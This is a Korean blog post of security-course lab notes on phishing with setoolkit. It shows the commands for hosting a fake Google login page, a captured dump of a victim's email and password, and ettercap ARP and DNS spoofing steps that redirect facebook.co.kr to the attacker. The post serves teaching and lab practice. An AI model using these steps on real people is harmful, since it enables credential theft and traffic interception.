본문 바로가기
메가IT아카데미 국기과정/리눅스와 시스템보안

[3-6] Setoolkit

by 한님폐하 2022. 9. 12.
  • 페이크 웹 사이트을 제공하는 모의해킹 도구이다.

1. Setoolkit 환경 설정과 실행

service apache2 start	# apache2 웹 서버 활성화
update-rc.d apache2 enable
vi /etc/setoolkit/set.config
APACHE_DIRECTORY=/var/www/html
setoolkit

 

2. 다른 터미널 창에서 'index.html', 'harvester_2022-05-22 17:15:31.971424.txt', 'post.php' 파일 생성 확인

  • index.html : 가짜 Google 로그인 페이지
  • 'harvester_2022-05-22 17:15:31.971424.txt' : 로그인할때 입력되는 아이디/패스워드가 저장되는 파일
  • post.php : 가짜 Google 로그인 페이지에 입력되는 아이디/패스워드를 'harvester_2022~~~.txt'에 연결하는 파일
                      실제 사이트로 리다이렉트가 되는 URL이 포함되어 있음
cd /var/www/html

 

2-1. 타겟에서 공격자 IP로 접속

http://[공격자 IP]

 

2-2. 공격자는 Setoolkit출력 내용으로 타겟이 입력한 아이디/패스워드를 확인한다.

('Array\n',)
('(\n',)
('    [GALX] => SJLCkfgaqoM\n',)
('    [continue] => https://accounts.google.com/o/oauth2/auth?zt=ChRsWFBwd2JmV1hIcDhtUFdldzBENhIfVWsxSTdNLW9MdThibW1TMFQzVUZFc1BBaURuWmlRSQ%E2%88%99APsBz4gAAAAAUy4_qD7Hbfz38w8kxnaNouLcRiD3YTjX\n',)
('    [service] => lso\n',)
('    [dsh] => -7381887106725792428\n',)
('    [_utf8] => \xe2\x98\x83\n',)
('    [bgresponse] => js_disabled\n',)
('    [pstMsg] => 1\n',)
('    [dnConn] => \n',)
('    [checkConnection] => \n',)
('    [checkedDomains] => youtube\n',)
('    [Email] => ncs10322@naver.com\n',)
('    [Passwd] => abcd1234\n',)
('    [signIn] => Sign in\n',)
('    [PersistentCookie] => yes\n',)
(')\n',

 

3. Setoolkit & DNS Spoofing을 이용한 페이크 웹 사이트 구성

  • 공격자의 IP Forwarding 기능을 활성화 한다.
echo 1 > /proc/sys/net/ipv4/ip_forward

 

  • 공격자의 '/etc/ettercap/etter.dns' 파일에 다음과 같은 내용을 설정한다.
echo "www.facebook.co.kr     A     192.168.20.50" >> /etc/ettercap/etter.dns
echo "*.facebook.co.kr       A     192.168.20.50" >> /etc/ettercap/etter.dns
echo "www.facebook.co.kr     PTR   192.168.20.50" >> /etc/ettercap/etter.dns

 

  • 공격자에서 'ettercap'을 실행하여 ARP Spoofing 및 DNS Spoofing을 실시한다.
ettercap -G &
# Sniff -> Unified sniffing -> Network interface : eth1 선택 -> 확인
# Hosts -> Scan for hosts 실시
# Hosts -> Host List 클릭 -> 목록 확인 -> Add to Target 1/2
# Mitm -> ARP poisoning -> Sniff remote connections 체크 -> 확인
# Plugins -> Manage the plugins -> dns_spoof 더블 클릭 -> * 표기 확인
# Start -> Start snffing

 

  • 공격자는 Setoolkit을 실행하고, 타겟은 DNS 캐시 정보를 초기화하고 'nslookup'을 실시하여 DNS Spoofing 공격을 받고 있는지 확인한다.
ipconfig /flushdns
nslookup www.facebook.co.kr

 

 

 

 

 

 

 

저작자표시 비영리 변경금지 (새창열림)

'메가IT아카데미 국기과정 > 리눅스와 시스템보안' 카테고리의 다른 글

[3-8] 레지스터 구조  (0) 2022.09.12
[3-7] BeEF  (0) 2022.09.12
[3-5] Metasploit  (0) 2022.09.12
[3-4] Bash Shellshock 취약점  (0) 2022.09.12
[3-3] Nmap 스캔  (0) 2022.09.12

관련글

티스토리툴바